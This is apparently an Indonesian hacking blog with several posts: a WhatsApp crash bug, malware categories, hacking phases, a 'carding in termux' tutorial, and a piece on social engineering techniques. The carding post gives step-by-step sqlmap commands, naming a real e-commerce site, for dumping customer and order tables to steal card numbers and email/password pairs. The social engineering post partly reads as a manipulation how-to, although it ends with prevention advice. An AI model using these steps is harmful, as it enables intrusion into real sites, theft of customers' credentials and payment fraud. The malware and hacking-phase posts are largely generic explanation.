Saturday, December 22, 2018

ASLI DAN TERPERCAYA : BUG WA Whatsapp(WA) yang sering dikira virus

Sekarang sayang akan membahas tentang BUG WA
Whatsapp(WA) yang sering dikira virus

WA merupakan suatu aplikasi android yang berguna untuk mengirimkan sebuah pesan singkat dan melakukan panggilan telepon melalui jaringan internet yang telah di unduh oleh banyak orang diseluruh dunia.

Kali ini redaksi ASLI DAN TERPERCAYA akan membahas sebuah ‘bug’ atau ‘error’ pada aplikasi WhatsApp yang di akibatkan oleh sebuah pesan berisi 404/code kainnya yang dikirim dari sesama pengguna whatsapp.

Hal ini redaksi ASLI DAN TERPERCAYA mengalaminya sendiri, ketika dari para anggota group WA yang redaksi ASLI DAN TERPERCAYA ikuti dan disana ada seorang anggota Group yang mengirimkan sebuah pesan yang berisi tulisan kode atau nomor yang bisa kita jumpai pada saat kita browsing di internet, yaitu kode 404/code lainnya yang artinya Page Not Found namun jika anda menerima pesan yang berisi tentang kode 404/atau code lainnya tersebut di whatsapp anda maka dapat dipastikan bahwa WA anda akan mengalami hal seperti ini.
Setelah itu Whatsapp akan menjadi berhenti sendiri dan keluar pesan “sepertinya Whatsapp Tidak Menanggapi” atau pesan yang muncul adalah “Sayangnya Whatsapp Telah Berhenti”
Dan yang paling parah adalah smartphone android anda akan mengalami blank atau blackscreen

Entah siapa yang yang pertama kali mengirimkan pesan tersebut sehingga banyak sekali para pengguna WA lainnya ikut-ikutan mengirimkan pesan ini sehingga menjadi menyebar dimana mana (viral)
Kenapa Pesan Tersebut Membuat Android Menjadi Error?

Sampai saat ini redaksi ASLI DAN TERPERCAYA masih belum mengetahui apa yang mennyebabkan pesan tersebut menjadikan android kita menjadi error, mungkin saja pesan tersebut error karena jumlah karakter yang terlalu banyak.

Namu menurut informasi yang dilansir dari situs merdeka.com dan winpoin.com ada seorang yang bernama Indrajeet Bhuyan dan dia telah menemukan cara untuk membuat whatsapp menjadi crash dengan cara mengirimkan sebuah pesan yang berisi jumlah banyak.Pesan ini hanya memberikan efek kepada para pengguna OS Android saja, untuk OS lainnya masih belum diketahui.

Redaksi ASLI DAN TERPERCAYA tidak akan bertanggung jawab atas apa yang akan terjadi jika pembaca setia ASLI DAN TERPERCAYA melakukan hal ini dan pembaca harus menanggungnya sendiri.
Lalu Bagaimana Untuk Mengatasi Error Tersebut?

Untuk mengatasi error tersebut sangat mudah sekali, yaitu pembaca ASLI DAN TERPERCAYA hanya perlu menghapus pesan tersebut supaya android anda menjadi normal, karena hal ini sudah terbukti redaksi ASLI DAN TERPERCAYA telah mencoba dan redaksi ASLI DAN TERPERCAYA tiru dari salah satu anggota group

Baiklah itu tadi adalah pembahasan mengenai bug atau error yang telah terjadi pada aplikasi android yang bernama whatsapp, postingan ini tidak bermaksud untuk menjelek-jelekkan atau menjatuhkan pihak tertentu dan materi ini hanya untuk membagikan informasi

ASLI DAN TERPERCAYA : Macam Jenis Nama Nama Virus Komputer dan Malware Komputer Terbaru Serta Cara Penyebarannya

 Mengenal Macam Jenis Nama Nama Virus Komputer dan Malware Komputer Terbaru Serta Cara Penyebarannya


Salah satu penyebab terbesar komputer rusak dan eror yaitu pada saat komputer terkena virus. Virus pada komputer ini tak hanya menyebabkan komputer atau suatu program eror tapi juga akan menyebabkan file atau dokumen anda terancam keberadaannya.

Saat ini sudah ada cukup banyak jenis jenis virus pada komputer. Virus komputer biasanya diciptakan untuk tujuan yang yang buruk, banyak efek buruk yang di timbulkan oleh virus komputer seperti memperbanyak dirinya sendiri sehingga memori hardisk dan ram menjadi kecil.

Hal ini menjadikan komputer sering lemot, hang atau freeze, lalu mengubah format ekstensi pada file dan program yang membuat program/file tersebut tidak bisa di gunakan, dan dapat juga mencuri data pribadi seseorang tanpa sepengetahuan orang tersebut. selain itu juga virus dapat merusak komponen hardware pada komputer.

Berikut penjelasan mengenai Macam Jenis Nama Nama Virus Komputer dan Malware Komputer Terbaru Serta Cara Penyebarannya yang harus anda ketahui, antara lain :
 Apa itu Trojan Horse?

Trojan horse adalah program yang memungkinkan serangan untuk mengontrol komputer pengguna dari lokasi yang jauh. Program ini biasanya disamarkan sebagai sesuatu yang bermanfaat bagi pengguna. Setelah pengguna menginstal program, ia memiliki kemampuan untuk menginstal muatan berbahaya, membuat backdoors, menginstal aplikasi lain yang tidak diinginkan yang dapat digunakan untuk membahayakan komputer pengguna, dll.

Daftar di bawah ini menunjukkan beberapa kegiatan yang dapat dilakukan penyerang menggunakan Trojan.

* Gunakan komputer pengguna sebagai bagian dari Botnet saat melakukan serangan penolakan layanan terdistribusi.
* Merusak komputer pengguna
* Mencuri data sensitif seperti kata sandi yang disimpan, informasi kartu kredit, dll.
* Memodifikasi file di komputer pengguna
* Pencurian uang elektronik dengan melakukan transaksi pengiriman uang tanpa izin
* Log semua tombol yang ditekan pengguna pada keyboard dan mengirim data ke penyerang. Metode ini digunakan untuk memanen id pengguna, kata sandi, dan data sensitif lainnya.
* Melihat tangkapan layar pengguna
* Mengunduh data riwayat penelusuran
Untuk itu anda harus waspada akan keberadaan virus trojan ini.

Lokasi penyebaran yang utama yaitu akses yang terhubung ke internet, seperti email dan data pribadi yang tidak dipassword. Untuk mengatasinya yaitu dengan menggunakan antivirus khusus untuk trojan, seperti Trojan remover dan Trojan hunter.
 Apa itu worms/cacing?


Worm adalah program komputer jahat yang mereplikasi dirinya sendiri biasanya melalui jaringan komputer. Seorang penyerang dapat menggunakan worm untuk menyelesaikan tugas-tugas berikut;

* Instal backdoors di komputer korban. Backdoor yang dibuat dapat digunakan untuk membuat komputer zombie yang digunakan untuk mengirim email spam, melakukan serangan penolakan layanan terdistribusi, dll. Backdoor juga dapat dieksploitasi oleh malware lain.
* Cacing juga dapat memperlambat jaringan dengan mengkonsumsi bandwidth saat mereka bereplikasi.
* Instal kode muatan berbahaya yang dibawa dalam worm.

cacing/ whorm mengeksploitasi kerentanan dalam sistem operasi. Mengunduh pembaruan sistem operasi dapat membantu mengurangi infeksi dan replikasi cacing.
Cacing juga dapat dihindari dengan memindai, semua lampiran email sebelum mengunduhnya.
 Memory Resident virus

Memory Resident Virus, seperti namanya macam jenis nama virus komputer ini dibuat untuk menginfeksi RAM. Dengan kata lain, virus ini berada di dalam memori komputer. Memory Resident Virus biasanya akan aktif jika sistem operasi komputer dinyalakan.

Keberadaan virus ini akan mengganggu program komputer yang seharusnya berjalan secara normal. Efek yang ditimbulkan dari keberadaan memory resident virus yaitu akan membuat sistem operasi komputer menjadi lemot.
 Web scripting virus

Seperti namanya web scripting virus adalah sebuah kode program yang digunakan untuk mempercantik konten dalam website. Namun kode inilah yang justru akan mengganggu program, biasanya virus ini akan muncul saat terhubung internet.

Untuk sistem proteksi bisa dilakukan dengan menginstall Microsoft tool bawaan windows. Lakukan scan secara teratur menggunakan aplikasi ini.
 Apa itu Virus?

Virus adalah program komputer yang menempel pada program dan file yang sah tanpa persetujuan pengguna. Virus dapat mengkonsumsi sumber daya komputer seperti memori dan waktu CPU. Program dan file yang diserang dikatakan "terinfeksi".

Virus komputer dapat digunakan untuk;
* Akses data pribadi seperti id pengguna dan kata sandi
* Tampilkan pesan yang mengganggu kepada pengguna
* Merusak data di komputer Anda
* Catat penekanan tombol pengguna

Virus komputer telah dikenal menggunakan teknik rekayasa sosial. Teknik-teknik ini melibatkan menipu pengguna untuk membuka file yang tampak seperti file normal seperti dokumen Word atau Excel ataupun apk..
Setelah file dibuka, kode virus dijalankan dan melakukan apa yang dimaksudkan untuk dilakukan.
 Multipartite virus

Seperti memory resident virus dimana macam jenis nama virus komputer ini bersembunyi dalam RAM yang nantinya akan menginfeksi  sistem operasi tertentu kemudian menginfeksi hardisk. Cara mengatasinya yaitu dengan membersihkan adanya bad sector dan lakukan disk defragmenter (jika menggunakan OS windows).
 FAT virus

FAT (File Allocation Table) adalah macam jenis nama virus komputer yang bertujuan untuk merusak file. Biasanya virus ini akan bersembunyi di tempat penyimpanan data pribadi. Dimana kemampuan virus ini adalah menyembunyikan file penting kita, sehingga seakan-akan file tersebut hilang karena sulit untuk kita cari.

Pencegahan : amati dan perhatikan data yang tersimpan di dalam hardisk. Apabila kita mencurigai adanya file yang tidak pernah kita buat untuk disimpan, berarti itu adalah FAT virus.
 Companion virus

Companion virus merupakan jenis virus yang juga akan dapat mengganggu data pribadi. Virus ini akan bersembunyi di dalam hardisk. Dimana kemampuan virus ini akan membuat ekstensi yang berbeda dari ekstensi file yang asli. Lokasi di dalam hardisk, biasanya berkumpul dengan file baru. Pencegahan : install scan antivirus dan juga download firewall.
 Polymorpic virus

Polymorpic virus merupakan jenis virus yang berkemampuan untuk menyandikan diri dengan cara yang berbeda saat menginfeksi sistem. virus ini boleh dikatakan virus yang pintar karena virus ini dapat mengubah strukturnya setelah melaksanakan tugas sehingga membuat sulit dideteksi oleh anti virus.
 Directory virus

Directory virus, jenis virus ini memiliki kemampuan menginfeksi file dengan ekstensi exe atau com, lalu file tersebut akan dipindahkan. Dimana saat file dijalankan, maka secara otomatis virus ini akan terdeteksi dan akan menginfeksi sistem yang lain.
  Macro virus

Marco Virus adalah macam jenis nama virus yang memiliki tingkah laku yang sama dengan kebanyakan virus, namun virus ini dibuat dengan bahasa pemrograman suatu aplikasi bukannya bahasa pemrograman suatu sistem operasi,misalnya macro yang terdapat di dalam microsoft word.
 Boot sector virus

Bad sector adalah jenis virus dibuat untuk menginfeksi bagian terkecil dalam hardisk (sektor boot). Boot sector virus biasanya bersembunyi dalam floppy disk.
 Overwrite viruses

Overwrite virus adalah jenis virus yang memiliki kemampuan untuk menghapus file atau data tanpa mengubah ukuran file tersebut. Sehingga pengguna tidak akan merasa curiga akan keberadaannya.
 Direct action viruses

Direct Action Virus adalah virus yang menginfeksi file AUTOXEC BAT. Dimana file ini terletak pada directory hardisk dengan kemampuan menginfeksi perangkat eksternal

Itulah penjelasan mengenai macam macam  jenis nama virus komputer. Semoga informasi ini dapat memberikan manfaat dan diharapkan bisa langsung menyadari keberadaan virus ini dan melakukan tindakan yang tepat pada saat komputer terserang virus yaitu dengan memasang atau menginstall Anti Virus dan Anti Malware terbaik di komputer dan laptop Anda.
 Untuk melindungi dari serangan semacam itu, kita dapat menggunakan metode berikut.

* Kebijakan yang melarang pengguna mengunduh file yang tidak perlu dari Internet seperti lampiran email spam, game, program yang mengklaim mempercepat unduhan, dll.
* Perangkat lunak anti-virus harus diinstal pada semua komputer pengguna. Perangkat lunak anti-virus harus sering diperbarui, dan pemindaian harus dilakukan pada interval waktu yang ditentukan.
* Memindai perangkat penyimpanan eksternal pada mesin yang terisolasi terutama yang berasal di luar .
* Pencadangan rutin data penting harus dibuat dan disimpan di media yang hanya dapat dibaca seperti CD dan DVD.
 Sekian dari saya semoga bermanfaat...
Referensi By Ethical Hacking Book

Wednesday, December 19, 2018

ASLI DAN TERPERCAYA :Mengidentifikasi Berbagai Jenis Teknologi Hacking

Mengidentifikasi Berbagai Jenis Teknologi Hacking
Selain berbagai jenis teknologi yang bisa digunakan hacker, ada berbagai jenis serangan. Serangan bisa dikategorikan pasif atau aktif. Serangan pasif dan aktif digunakan pada infrastruktur keamanan jaringan dan host. Serangan aktif sebenarnya mengubah sistem atau jaringan yang mereka serang, sedangkan serangan pasif berusaha mendapatkan informasi dari sistem. Serangan aktif mempengaruhi ketersediaan, integritas, dan keaslian data. Serangan pasif adalah pelanggaran kerahasiaan
 Application : Aplikasi biasanya tidak diuji untuk kerentanan saat pengembang menulis kode, yang dapat meninggalkan banyak kekurangan pemrograman yang dapat dimanfaatkan oleh hacker
 Shrink-wrap code : Banyak program off-the-shelf hadir dengan fitur tambahan yang tidak diketahui pengguna umum, yang dapat digunakan untuk mengeksploitasi sistem. Salah satu contohnya adalah macro di Microsoft Word, yang memungkinkan hacker untuk menjalankan program dari dalam aplikasi
 Misconfigurations : Sistem juga dapat salah ketika dikonfigurasi atau dibiarkan pada pengaturan keamanan umum terendah untuk meningkatkan kemudahan penggunaan bagi pengguna, yang dapat menyebabkan kerentanan dan serangan
 Selain kategori aktif dan pasif, serangan dikategorikan sebagai serangan di dalam atau di luar. Gambar diatas menunjukkan hubungan antara serangan pasif dan aktif, dan serangan dari dalam dan luar. Serangan yang berasal dari dalam perimeter keamanan suatu organisasi adalah serangan di dalam dan biasanya disebabkan oleh “orang dalam” yang memperoleh akses ke sumber daya lebih banyak dari yang diperkirakan. Serangan dari luar berasal dari sumber di luar batas keamanan, seperti Internet atau koneksi akses jarak jauh
 Memahami Fase yang Berbeda yang Terlibat dalam Etika Hacking dan Daftar Lima Tahapan Etika Hacking
 Tahap 2 : Scanning
 Scanning melibatkan pengambilan informasi yang ditemukan selama pengintaian dan menggunakannya untuk memeriksa jaringan. Alat yang mungkin digunakan oleh peretas selama tahap scanning dapat mencakup dialer, port scanner, network mapper, sweepers, dan vulnerability scanner. Hacker mencari informasi yang dapat membantu mereka melakukan serangan seperti nama komputer, alamat IP, dan akun pengguna
 Tahap 3 : Mendapatkan Akses
 Ini adalah tahap dimana hacking sebenarnya terjadi. Kerentanan yang ditemukan selama tahap pengintaian dan scanning sekarang dimanfaatkan untuk mendapatkan akses.
  Tahap 1 : Pengintaian Pasif dan Aktif
Pengintaian pasif melibatkan pengumpulan informasi mengenai target potensial tanpa pengetahuan individu atau perusahaan yang ditargetkan. Pengintaian aktif melibatkan menyelidik jaringan untuk menemukan host individu, alamat IP, dan layanan di jaringan.
 Tahap 5 : Menutupi Jejak
 Begitu hacker berhasil mendapatkan dan mempertahankan akses, mereka menutup jejak mereka untuk menghindari deteksi oleh petugas keamanan, untuk terus menggunakan sistem yang dimiliki, untuk menghapus bukti hacking, atau untuk menghindari tindakan hukum.
 Tahap 4 : Mempertahankan Akses
 Begitu seorang hacker mendapatkan akses, mereka inginmenyimpan akses itu untuk eksploitasi dan serangan di masa depan. Terkadang, hacker membajak sistem dari hacker lain atau petugas keamanan dengan mengamankan akses eksklusif mereka dengan backdoor, rootkit, dan Trojan

ASLI DAN TERPERCAYA :Tutorial carding di termux

Tutorial carding di termux
LANGKAH":
1.silahkan cari web vuln sql injection dulu ya..caranya masukin dork kalian ke search enginering kayak gugel,yahoo,yandex dll(baca juga tutorial Mencari web vuln sql lebih lengkap)
2.jika sudah ketemu web yang vuln silahkan kalian buka termux
3.disini kita akan mendapatkan sqlmapnya
 Dengan command dibawah ini
-cd sqlmap(tekan Enter)
-python2 sqlmap.py -u bukalapak.com --Dns
4.jika sudah kita lakukan command d atas kita tunggu proses penginjekan databasenya
5.jika muncul tulisan yang meminta command kita ketik aja Y Jika gk ada Y kita cek terkadang C
6.jika database udh muncul kita masukin lg command
 -Python2 sqlmap.py -u bukalapak.com -D nama database yg mau kita buka --tables
7.jika proses slesai maka akan muncul daftar table dr database site tsb.
8.nah karna disini tujuan kita adalah carding berarti yang kita cari adalah acc or cc,dan biasanya acc itu ada table member,customer,user dan kalau cc biasanya ada di order tapi untuk sekarang ini Mencari cc method dump itu udh 1000:1 jadi para carder profesional beralih method menjadi spammer
9Jika sudah kita tentukan table mn yg mau kita dump maka kita masukin command di bawah
-Python2 sqlmap.py -u sitetarget.com -D nama database -T nama table --dump
10.tunggu hingga proses slesai
11. Done slamat anda berhayal mendapatkan empas(email pasword)

NB: empas harus d checker ya(cek valid mail,valid amazon dll sesuain kebutuhan kalian)
BACA JUGA CARA CHECKER EMPAS

Ok sekian tutor dari gue moga bermanfaat
Semua aksi yang kalian lakukan bukan tanggung jawab kami

ASLI DAN TERPERCAYA :Social engineering tehnik

 Apa itu Social engineering tehnik?

pengertian Social engineering adalah manipulasi psikologis  seseorang dengan tujuan untuk mendapatkan informasi tertentu atau melakukan hal tertentu dengan cara menipunya secara halus dan tidak dia sadari. manipulasi psikologis dikakukan dengan berbagai media yang tujuan nya untuk mempengaruhi pikiran korban,misalnya menggunakan suara (berbicara untuk meyakinkan korban),gambar(memasang gambar yang erotis agar di klik),tulisan  (menulis artikel yang persuasif dan meyakinkan misal menulis tutorial cara hack akun facebook,tapi palsu :D)

Dengan kata lain Social engineering adalah tehnik untuk mendapatkan informasi /hak akses dengan cara menipu korban nya dengan halus dan tanpa dia sadari. Semua kriminal 100% menggunakan tehnik ini untuk mendapatkan informasi dari korban nya. mulai dari tukang copet yang menyamar sebagai penumpang biasa, penipu yang menjanjikan hal luar biasa pada korban nya,sexpredator yang menggunakan facebook untuk berinteraksi dengan korban nya. dan lain sebagainya.
Kenapa social engineering tehnik?

Social engineering mentargetkan rantai terlemah dalam sistem keamanan komputer,yaitu user atau pengguna atau manusia itu sendiri. Bug atau celah keamanan ini bersifat universal,
tidak tergantung platform,sistem operasi,protocol,software ataupun hardware.
vulnerability disetiap sistemDengan artian,semua sistem tercanggih di planet ini memiliki celah keamanan tersebut.

Tidak semua pekerjahan hacking (menjebol sistem) murni dilakaukan dari balik layar atau hanya fokus meng exploitasi mesin,karena semakin berkembang nya zaman keamanan komputer juga semakin sulit ditembus.teknik ini banyak dipake untuk penyebaran malware atau mendapatkan informasi yang diperlukan hacker,seperti identitas seseorang.

Untuk mendapatkan sebuah akses ke sebuah sistem (komputer,gedung,relasi,komunitas,rasa percaya kita) bisa dilakukan dengan melakukan pendekatan dengan manusia itu sendiri untuk mendapatkan kepercayaan agar pelaku social engineer  bisa melakukan apa yang dia inginkan tanpa korban sadari. ketika sadar itu sudah sangat terlambat. jadi yang disebut sistem disini bukan hanya komputer tetapi bisa juga pikiran kita sendiri,keamanan sebuah gedung,sebuah kommunitas dll.

Social engineering tehnik tidak hanya dilakukan oleh kriminal, tetapi polisi/penegak hukum juga menggunakan tehnik ini untuk memata-matai target operasi dan  mendapatkan informasi tentang target operasi.
 9 Jenis Social engineering tehnik
 Reverse social engineering (RSE)

Tehnik ini dilakukan dengan 3 langkah yaitu:
-Merusak
pertama-tama hacker akan berusaha melakukan pengrusakan terhadap infrastruktur network yang ada sehingga kinerja system akan terganggu dan tidak berjalan sebagaimana mestinya,secara otomatis pemilik system akan berusaha mencari informasi untuk memperbaiki hal ini.
-Memasang Iklan
Iklan bisa dikirim ke alamat email pemilik sistem yang sebelum nya sender nya sudah di spoof seolah-olah email berasal dari perusahaan security terpercaya, atau bisa dilakukan dengan memberikan  kartunama sebelum serangan dimulai agar ketika hacker mengacaukan sistem si korban akan menghubungi si hacker yang sebelum nya memberikan kartunama /iklan dalam bentuk email
-Membantu
Setelah korban melihat iklan dan mengontak teknisi untuk perbaikan sistem (yang sebenarnya adalah si hacker itu sendiri) alih-alih membantu malah si hacker sudah mendapat akses penuh ke sistem dan bisa melakukan hal yang berbahaya seperti menanam backdoor ke sistem,mengambil data rahasia dll

Tehnik ini sering kita lihat di filem-filem box office. dimana pemeran utama menyamar menjadi teknisi atau IT konsultan untuk bisa mengakses perangkat secara fisik/remote dan menanam backdoor
 PiggyBack Ride

singkatnya tehnik ini menggunakan seseorang yang memiliki akses /wewenang agar kita mendapat hak akses seperti halnya orang tersebut.
Contohnya: kita berjalan dibelakang orang yang memiliki akses ke sebuah gedung,begitu orang tersebut membuka pintu dengan security key yang dimilikinya kita ngikut masuk dibelakang nya. contoh lain seperti ketika hujan lebat kita sengaja membawa banyak barang /membawa kotak di kiri dan kanan kemudian dengan sopan kita meminta tolong seseorang yang ada di sekitar yang memiliki akses untuk membukakan pintu dengan alasan security key yang kita miliki susah diambil karena ada di kantong /tas /lupa di taruh di dalam kotak .dll
Techie Talk (berbicara layaknya ahli)

Kebanyakan hacker sangat mahir dalam hal teknis, ketika hacker akan meakukan social engineering maka si hacker dapat berbicara lancar seperti ahli soal komputer untuk mendapatkan kepercayaan dai si korban.
contohnya ketika hacker berpura-pura dari  bagian helpdesk dan memberitahukan kepada korban nya bahwa sistem nya telah diretas dan si korban harus mengganti password baru ,maka si hacker akan memandu korban nya untuk mengganti password dan menanyakan password apa yang akan digunakan untuk memastikan password yang dipilih korban aman. nah loo.. secara gak langsung si hacker dapet password baru dari si korban.
Phishing Attack (Scamming)

tehnik phising atau scaming merupakan tehnik untuk mendapatkan informasi sensitif(Data pribadi atau akun ) dari korban dengan cara menulis email yang seolah-olah berasal dari website resmi seperti paypal , biasanya dalah email nya akan tertulis untuk mengkonfirmaasi meng update data paypal dan mengganti password paypal karena akun yang korban miliki disinyalir telah disalahgunakan orang dan disertakan link yang menuju ke website mirip100% seperti paypal yang sebenarnya website tersebut adalah biatan dari si hacker itu sendiri. dengan cara ini hacker mendapatkan semua data yang diperlukan untuk mengambil alaih akun seseorang. teknik ini bisa dikembangkan labih lanjut untuk mendapatkan sasaran tertarget atau yang bisa dikenal dengan spear phishing attack
selain email ,tehnik ini juga menggunakan media social media seperti facebook untuk mendapatkan korban nya.
Whalling attack (Memancing Paus )

whalling attack menargetkan korban dengan profile tinggai atau orang-orang penting dalam bidang yang digelutinya. sebagai contoh : hacker bisa mendapat informasi penting seperti kartu kredit dan data pribadi lain nya dengan cara menggali informasi yang dipajang korban secara online. semisal,di dalam facebook page nya tertulis bahwa korban alumni universitas A dengan hobby golf, maka si hacker bisa membuat scam email yang seolah-olah resmi dikirim  dari universitas A yang isinya ajakan untuk mengikuti turnamen golf antar alumni danmeminta untuk mengisi formulir yang telah disediakan sebagai syarat mengikuti turnamen tersebut. nah formulir yang disediakan adalah data  pribadi yang harus diisi , dengan mengumpulkan data pribadi sepotong demi sepotong,si hacker bisa mendapat 100% data pribadi dari korban.
Vishing attack (Voice or VoIP Phishing attack)

gagal dengan tehnik phishing atau whaling ? cobalah dengan tehnik vishing , dimana dalam tehnik ini menggunakan telephone utnuk mendapatkan informasi dari si kotban. hacker bisa berpura-pura menjadi karyawan bank dan memberitahukan bahwa kartu kreditnya ada masalah dan perlu mengupdate data-data lama dengan yang baru. dalam percakapan nya korban secara tidak sadar akan ditanyakan nomer CC dan pin serta identitas diri.
Social (Engineer) Networking

media social seperti facebook,twitter,instagram dll menjadi surga bagi social engineer, di sini sebagian besar orang mengexpose data pribadinya seperti tempat tanggal lahir ,hobi,tempat tinggal,relasi,dll . social engineer bisa mendapat kepercayaan dengan menjalin pertemanan dengan korban dan mendapatkan kepercayaan. setelah terjalin kepercayaan hacker bisa menyalahgunakan kepercayaan yang telah diberikan oleh korban untuk hal yang merugikan korban
Neuro-linguistic programming (NLP)

social engineer yang baik harus memiliki pemahaman yang kuat untuk memanipulasi pikiran manusia.
Neuro-linguistik pemrograman (NLP) adalah salah satu alat psikologis yang digunakan oleh para social engineer untuk memanipulasi korban dan jika dilakukan dengan benar hasilnya luar biasa.NLP berkaitan dengan bagaimana seseorang mendapat kepercayaan dengan cara berkomunikasi (verbal atau non verbal).

Sebagai contoh ketika seorang social engineer malancarkan aksinya dia akan berhati-hati dalam memilih kata-tata,mengatur intonasi nafas,nada suara dan gestur tubuhnya. hal ini akan membantu menjalin kepercayaan seseorang di level bawah sadar, korban akan hormat/mengagumi si pembicara. setelah terjalin rasa percara bisa dilanjut ke tahap selanjutnya seperti memberi senyuman hangat dan ringan,menyentuh bahu atau lengan mereka untuk memberikan rasa aman dan menggunakan kata-kata yang menunjukkan pikiran positif, gambar, dan emosi. Semua gesture, visual, dan tindakan verbal(disebut anchoring dan reframing dalam hal NLP) memberikan pesan bawah sadar yang mempengaruhi orang untuk memiliki perasaan positif dan memperoleh rasa hubungan dengan pelaku social engineering . kalau hubungan sudah terjalin dengan kuat,sugesti kuat pelaku social engineering akan bisa mengarahkan korban nya untuk melakukan hal yang menguntungkan pelaku.
Sex Sells

satu fakta tentang semua orang, dimana orang akan mau melakukan hal bodoh jika sudah tertarik dengan seseorang (jatuh cinta) tapi dalam kontek artikel ini yang dimaksud adalah membuat orang tertarik (mengidolakan,menganggap kita suhu/guru/mentor) dengan kita agar korban percaya dan tanpa sadar bisa kita kendalikan untuk melakukan hal yang kita inginkan.
di luar dunia computer security Tehnik ini banyak sekali digunakan oleh cewek matre untuk ndapetin duid om om 😀 dan cabe-cabean kwkwkw.
Tehnik ini juga digunakan oleh penyebar kepercayaan/agama dalam menyerbarluaskan kepercayaan nya atau agamanya
Contoh implementasi social engineering tehnik
 Menyebarkan Malware menggunakan program bajakan

malware dalam aplikasi bajakanHacker (pembuat malware) akan menyisipkan kode jahatnya (malware)pada aplikasi bajakan yang telah dicrack , dengan begitu si korban tidak akan sadar.karena korban mendapatkan apa yang diinginkan nya (Software berbayar yang gratis /telah di crack) tetapi si hacker juga mendapatkan apa yang dia dia inginkan,yaitu tanpa sadar si korban telah menginstal backdoor/trojan kedalam sistemnya dan si hacker mempunyai hak penuh akan komputer si korban(victim)
Menyebarkan malware dan membajak facebook account lewat gambar porno (Phishing)

Pernah liat orang posting gambar-gambar porno di grup? atau muncul auto like gak jelas di komen status kita? account orang yang memposting gambar porno tersebut telah dibajak,ini bermula ketika korban melihat
postingan gambar porno di grup kemudian dia meng klik tautan tersebut,sebelum masuk ke website porno biasanya akan ditanyakan atau disuruh verifikasi kalo sudah 18+ dengan cara mengisikan username dan password facebook. nah disinilah kenapa account facebook bisa dibajak. karena korban tanpa sadar telah mengetikan facebook account di situs lain (website yang dibuat hacker) dengan kata lain korban telah menyerahkan facebook account dengan sukarela. setelah facebook account didapatkan maka selanjutkan account tersebut akan digunakan botnet untuk memposting gambar porno ke grup lain.
 Menyebarkan Malware dengan fake alert(peringatan palsu)

Ketika korban (victim) sedang browsing atau sedang mencari video-vedo gak jelas (video dewasa B*k**p) kemudian di websitenya tertulis, “your codec not instaled pls install 1st to view this video” ketika si korban melihat hal tersebut pasti akan mendownload kodek palsu tersebut dan menginstall nya,si korban juga tak curiga karena korban bisa menonton apa yang dia inginkan setelah menginstal codec palsu yang ternyata malware.
Mendapatkan data pribadi dengan Spam email

Pernah mendapat email gak jelas yang isinya menang undian atau liburan dan disuruh mengisi data pribadi dan mengupload bukti diri,yakin lah ini semua adalah palsu.dan si hacker hanya menginginkan data pribadi korban yang nantinya akan dia gunakan untuk menutupi jati dirinya dalam melakukan aksi kejahatan di dunia maya.
Menipu pengguna telefon dengan memberitahukan menang undian

Pernah mendapat sms menang undian?karena kamu da tau itu penipuan jadi kamu diemin,tapi bayangkan ada berjuta2 sms yang dikirim scammer ke nomer acak. dari sejuta nomer pasti ada seratus yang bisa kena tipu dan percaya. orang yang percaya biasanya orang yang gaptek,dengan mudahnya mereka dipengaruhi oleh scammer dan dituntun sampai ke atm dengan instruksi yang meyakinkan dengan mengatasnamakan dari bank sampai akhirnya malah korban yang mentrasfer duit ke scammer,karena biasnaya disuruh memilih menu dalam bahasa inggris di ATM.
Mendapatkan account game dengan menyebarkan cheat /hack dan phising.

Hello gamers ,jdi gamer harus gaul juga karena tidak tertutup kemungkinan account game online mu jadi sasaran hacker. Karena game online memiliki nilai ekonomi di dunia nyata,banyak gamer yang memerlukan game item /game currency secara instan dengan cara membeli dari player lain dengan uang beneran. Metode yang paling sering digunakan diantaranya:

-Pinjem karakter / sharing account dengan teman in game.


Yakinlah walau kamu da sering banget main bareng dia,jangan pernah mau pinjem –pinjeman character, karena account ibarat sebuah celana dalam,itu adalah privacy yang gak boleh dipinjem pinjemin. Bisa-bisa setelah dipinjemin charactermu bakalan telanjang bulat.

 -Mendownlod cheat /hack game

Jalan pintas yang menggiurkan adalah cheat, dimana kita membayangkan bakal bisa dapet gold dengan mudah menggunakan cheat, tetapi dibalik iming-iming benefit menggunakan cheat kamu juga telah menginstall keylogger bahkan trojan yang akan menyadap account game mu.

 -Phishing website event

Phising adalah teknik social engineering dengan cara membuat tampilan website /program sama persis seperti aslinya untuk mendapatkan data pribadi korban.

Pernah mendapat email atua mailbox ingame yang isinya  “account mu mau di blok karena melakukan tindakan ilegal,dan disuruh konfirmasi data game di  website yang diberikan ”. yakinlah. Pihak provider game atau staff resmi tidak akan menanyakan account  dari pelanggan nya. Untuk menghindari tehnik ini adalah dengan selalu memperhatikan URL website dan hafalkan URL dari website resmi dari tiap game.
Cara pencegahan social engineering tehnik
Jangan mudah percaya dan bersihkan pikiran porno

Jika kamu benar-benar tidak tau tentang internet,minimal bersihkan pikiran mu dari “Pornografi” karena kebanyakan hacker menggunakan gambar porno untuk memancing korban nya agar ngeklik dan menuntunnya untuk mendownload aplikasi berbahaya(malware). jika kamu maniak pengguna social media,jangan mudah percaya akan gambar profile yang cakep,lalu menjalin hubungan,berbagi informasi pribadi lalu ketemuan
membersihkan-pikiranditempat yang jauh (anak dibawah umur dan wanita rawan menjadi korba
n dengan cara ini)

Berfikir sehat dan relevan

jika kamu tiba-tiba mendapat email,telefon,pesan singkat telah memenagkan hadiah dan kamu tidak merasa mengikuti hal hal seperti itu,maka jangan tanggepin. atau pas kebetulan kamu menabung di bank dan mendapat sms menang undian dari bank tersebut maka jangan langsung percaya, apa lagi nomer yang digunakan adalah nomer pribadi. dan satu lagi ketika mendapat telfon yang mengatasnamakan bank dan meminta data-data pribadi jangan pernah dikasih. karena data pribadi tidak pernah ditanyakan lewat telefon untuk alasan apapun. ngomong aja akan diantar ke bank langsung datanya jika memang diperlukan.

Jangan selalu berpikir maunya instan dan gratis

(semua ada harga yang harus dibayar)
Kelemahan ini sering dipakai hacker atau penipu untuk meyakinkan korban nya, misalnya investasi bodong dengan bunga 20%sebulan,awal-awal emang jalan ,dibilan ke 3-4 dia bawa kabur smua duid.
jangan berfikir untuk mendapat segala sesuatu instan dan gratisNah ketika kita membutuhkan aplikasi premium tapi gak mau beli,da disediakan aplikasi bajakan dan disediakan crack/key generator,tapi tanpa kamu ketahui ada bahaya yang mengancam para pengguna aplikasi bajakan .
untuk para gamers,kadang ingin jalan singkat dengan menggunakan cheat ,bot  untuk mempermudah dalam bermain game nya. tetapi tanpa disadari cheat atau bot yang didapatkan nya secara gratis telah disisipi malware. dan akhirnya akun nya yang dirampok/dihack.

jangan terlalu percaya dengan orang yang kita anggap dekat di dunia maya.

